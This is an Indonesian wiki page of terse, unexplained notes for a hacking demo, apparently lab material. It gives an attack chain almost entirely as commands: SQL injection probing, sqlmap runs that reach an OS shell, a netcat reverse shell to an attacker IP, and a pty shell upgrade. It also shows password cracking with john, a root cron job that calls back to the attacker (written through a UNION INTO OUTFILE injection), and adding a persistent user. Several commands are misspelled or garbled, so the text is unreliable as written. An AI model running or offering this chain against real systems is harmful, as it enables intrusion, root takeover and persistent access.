Hacking: Orek-Orekan Demo Hacking

From OnnoWiki
Jump to navigation Jump to search

netdiscover

SQL Injection - GET - HOST

GET index.php?id=1' kalau ada ERROR ada celah

HOST username admin password " ERROR ada celah SQL injection

Attack sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 3 -level=6 --risk=5 sqlmap -u "url-yangadaerror" --data="POSTDATA=diambildaritemperdata" --batch -v 0 lakukanremoteshell

OS-shell> id, ls

OS=shell> whereis mc OS-shell> /bin/nc.traditional ipattacker 9999 =e /bin/sh

di komuter attacker nc -lvvp 9999


dapat session id


pyhton -c 'impprt pty;pty.spwwan("/bin/bash/")'

exploit

./john


pakai burpsuite port 8080 di localhost intercept off

authentikasi ulang dengan password yang salah

burpsuite dapat cookies & session 200 normal 300 direct 400 error / forbidden i

  • * * * * root /bin/nc.traditional ipattacker 5555 -e /bin/sh --- ini utk memerinatahkan root exekusi nc

nmap localhost --- check apakah port sudah di buka


pakai burpsuite pakai Decoder >EDivafe AS ASCII HEX copy ASCII HEX masukan ke


pakai burpsuite pakai repeater myusername=admin &mypassword=" 1=1 union elect 0x20,0x20 INTO OUTFILE * * * * * rootdst --&Submit=Login

check id di OS Shell nc id dapat password root


useradd domas adduser passwd

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=Hacking:_Orek-Orekan_Demo_Hacking&oldid=38731"